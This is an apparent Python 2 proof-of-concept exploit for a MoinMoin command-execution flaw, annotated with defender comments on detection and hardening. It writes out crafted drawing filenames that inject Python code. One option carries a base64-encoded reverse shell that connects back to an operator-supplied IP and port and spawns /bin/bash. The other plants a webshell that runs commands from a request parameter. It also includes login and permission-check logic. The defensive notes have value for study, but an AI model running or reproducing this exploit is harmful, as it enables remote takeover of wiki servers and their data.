MoinMoin 'moinmelt.py'任意命令执行漏洞(3)

# Operator prompts of the proof-of-concept (Python 2: raw_input / print
# statements). Annotated for defenders reviewing what this tool does.
#
# The host string is taken from the typed URL by removing the "http://"
# scheme and the page names "FrontPage" and "WikiSandBox".
target = raw_input("[*] Target site? ").replace("http://","").replace("FrontPage","").replace("WikiSandBox","")
 # Menu text only; the choice is read into `method` as a string.
 print "[*] Method of execution:"
 # Incident-response note: per this menu text, option 1 leaves something that
 # becomes reachable only after Apache restarts. On a suspected compromise,
 # inspect the wiki installation for unexpected or modified files before
 # restarting the web server, not afterwards.
 print "[1] Stealth webshell, available upon Apache restart (24H)"
 print "[2] Backconnect shell, available immediately (RISKY)"
 print "[3] Exit"
 method = raw_input("> ")

# Selects the (filename, data) pair used later in the script; how the pair is
# submitted to the wiki is not visible in this part of the listing.
#
# Detection and hardening notes for both branches:
#  * Each `filename` starts with the fixed text "drawing.r if()else[]" and
#    then contains an embedded newline followed by Python statements. A
#    legitimate drawing name has no newline, so server-side validation
#    should accept only a strict allowlist of characters in such names.
#  * Dots inside the embedded statements are written as the escape \56, so
#    signatures that match dotted names literally (e.g. "os.popen") will not
#    fire on the request; match on the fixed prefix or on the newline.
if method=='3':
    exit()
 elif method=='2':
    print "[*] Preparing exploit.."
    # The statement embedded after the newline reads the file it is part of
    # (open(__file__)), splits the text on the literal '[MARK]', takes the
    # second-to-last piece, strips NUL characters and executes it.
    # NOTE(review): where '[MARK]' gets written is not shown here; a Python
    # file in the wiki tree containing that literal is worth checking for.
    filename = 'drawing.r if()else[]\nexec eval("open(__file__)\\56read()\\56split(\'[MARK]\')[-2]\\56strip(\'\\\\0\')")'
    # Base64 text decoded at runtime with the Python 2 "base64" codec.
    # Analysts should decode it offline in an isolated environment and treat
    # the result as untrusted code. The menu text for this option calls it a
    # back-connect shell, so the network-level indicator is an outbound
    # connection opened by the web server account; default-deny egress
    # filtering for that account is the matching mitigation.
    data = """IyAtKi0gY29kaW5nOiBpc28tODg1OS0xIC0qLQoKaW1wb3J0IHN5cywgb3MsIHNvY2tldCwgcHR5
              LCBzZWxlY3QKcHdkID0gb3MucGF0aC5kaXJuYW1lKF9fZmlsZV9fKQpzeXMucGF0aC5pbnNlcnQo
              MCwgcHdkKQoKZGVmIG1vaW5tZWx0c2hlbGwoaG9zdCxwb3J0KToKICAgIHNvY2sgPSBzb2NrZXQu
              c29ja2V0KCkKICAgIHRyeToKICAgICAgICBzb2NrLmNvbm5lY3QoKGhvc3QsIGludChwb3J0KSkp
              CiAgICBleGNlcHQ6CiAgICAgICAgcmV0dXJuCiAgICBwaWQsIGNoaWxkUHJvY2VzcyA9IHB0eS5m
              b3JrKCkKICAgIGlmIHBpZCA9PSAwOgogICAgICAgIHNvY2suc2VuZCgiW35dIFx4MWJbMTszMW1N
              b2luTWVsdCBSZXZlcnNlIFNoZWxsXHgxYlswbVxyXG4iKQogICAgICAgIG9zLnB1dGVudigiSElT
              VEZJTEUiLCIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUFdEIiwgcHdkKQogICAgICAg
              IG9zLnB1dGVudigiSE9NRSIsIG9zLmdldGN3ZCgpKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIs
              Jy91c3IvbG9jYWwvc2JpbjovdXNyL3NiaW46L3NiaW46Jytvcy5nZXRlbnYoJ1BBVEgnKSkKICAg
              ICAgICBvcy5wdXRlbnYoIlRFUk0iLCdsaW51eCcpCiAgICAgICAgb3MucHV0ZW52KCJQUzEiLCdc
              eDFiWzE7MzFtXFx1QFxcaDpcXHdcXCQgXHgxYlswbScpCiAgICAgICAgcHR5LnNwYXduKCIvYmlu
              L2Jhc2giKQogICAgICAgIHNvY2suc2VuZCgiXHJcbiIpCiAgICAgICAgc29jay5zaHV0ZG93bigx
              KQogICAgZWxzZToKICAgICAgICBiID0gc29jay5tYWtlZmlsZShvcy5PX1JET05MWXxvcy5PX05P
              TkJMT0NLKQogICAgICAgIGMgPSBvcy5mZG9wZW4oY2hpbGRQcm9jZXNzLCdyKycpCiAgICAgICAg
              eSA9IHtiOmMsYzpifQogICAgICAgIHRyeToKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAg
              ICAgICAgICAgIGZvciBuIGluIHNlbGVjdC5zZWxlY3QoW2IsY10sW10sW10pWzBdOgogICAgICAg
              ICAgICAgICAgICAgIHogPSBvcy5yZWFkKG4uZmlsZW5vKCksNDA5NikKICAgICAgICAgICAgICAg
              ICAgICB5W25dLndyaXRlKHopCiAgICAgICAgICAgICAgICAgICAgeVtuXS5mbHVzaCgpCiAgICAg
              ICAgZXhjZXB0OgogICAgICAgICAgICBwYXNzCgp0cnk6CiAgICBwaWQgPSBvcy5mb3JrKCkKICAg
              IGlmIG5vdCBwaWQ6IG1vaW5tZWx0c2hlbGwoJ1tJUF0nLCAnW1BPUlRdJykKZXhjZXB0OgogICAg
              cGFzcyAjIEF2b2lkIGludGVybmFsIHNlcnZlciBlcnJvcnMKCmZyb20gTW9pbk1vaW4ud2ViLnNl
              cnZpbmcgaW1wb3J0IG1ha2VfYXBwbGljYXRpb24KYXBwbGljYXRpb24gPSBtYWtlX2FwcGxpY2F0
              aW9uKHNoYXJlZD1UcnVlKQ==""".strip().decode("base64")
 elif method=='1':
    print "[*] Preparing exploit.."
    # The statements embedded after the newline import os and define
    # execute(p, r), which passes the request value 'c' to os.popen and
    # prints the command output into r. Indicator in access logs: wiki
    # requests carrying a 'c' parameter.
    filename = "drawing.r if()else[]\nimport os\ndef execute(p,r):exec\"print>>r,os\\56popen(r\\56values['c'])\\56read()\""
    # File content for this option is the fixed text below.
    data = "MoinMoin error\n"
 else:
    print "[-] \x1b[0;31mInvalid method\x1b[0m"
    exit()

# Pre-flight check: fetch /WikiSandBox over plain HTTP and look for UI strings
# in the returned HTML to decide whether the page is editable without login.
#
# Defender notes:
#  * "Edit (Text)" on WikiSandBox for an anonymous client is what the script
#    reports as "No security". Restricting write ACLs raises the bar, but the
#    fallback below uses any account that can log in, so ACLs alone do not
#    close the underlying flaw; upgrade to a release in which the vendor has
#    fixed it.
#  * Log pattern visible here: GET /WikiSandBox, then POST / with
#    action=login, then GET /WikiSandBox again from the same client.
#  * No headers are set in the visible requests calls, so the library's
#    default User-Agent would be sent unless it is changed elsewhere.
print "[*] Checking permissions on WikiSandBox page.."
 username=None
 password=None
 authorizationcookie=None
 jar=None
 permission_check = requests.get("http://%s/WikiSandBox" % target).text
 if "Edit (Text)" in permission_check:
    print "[+] No security"
    check = True
 elif "Immutable Page" in permission_check:
    print "[-] Authorization required"
    check = False
 else:
    print "[-] \x1b[0;31mCould not identify editable page!\x1b[0m"
    print "[-] Authorization required"
    check = False
 if not check:
    have_acc = raw_input("[*] Do you have an account? [Y/N] ").lower()
    if have_acc.startswith("y"):
        username = raw_input("[*] Username: ")
        password = getpass.getpass("[*] Password: ")
    else:
        # The script points the operator at the wiki's self-registration
        # action. Where open sign-up is not required, disabling it and
        # alerting on newly created accounts that edit immediately removes
        # this fallback.
        print "[-] \x1b[0;31mCreate an account and restart the exploitation process\x1b[0m"
        print "[-] %s/?action=newaccount" % target
    url = "http://%s/" % target
    print "[*] Logging in"
    # The credentials are posted as form fields to the wiki root over http://.
    signon = {'action':'login','name':username,'password':password,'login':'Login'}
    jar = requests.post(url, data=signon).cookies
    # Any cookie value of exactly 40 characters is taken as proof of login.
    for cookie in jar.values():
        if len(cookie)==40:
            authorizationcookie=cookie
    if not authorizationcookie:
        print "[-] \x1b[0;31mLogin failed\x1b[0m"
        exit()
    else:
        print "[+] Login succeeded"
    permission_check2 = requests.get("http://%s/WikiSandBox" % target).text
 # The triple-quoted text below is a bare string expression, i.e. a disabled
 # block of code; nothing inside it runs.
 """
    if "Edit (Text)" in permission_check2:
        print "[+] Successfully authorized to edit pages"
    elif "Immutable Page" in permission_check:
        print "[-] \x1b[0;31mFailed authorization check\x1b[0m"
        exit()
    else:
        print "[?] \x1b[0;33mLost track of environment.. continuing anyway\x1b[0m"
        exit()
 """
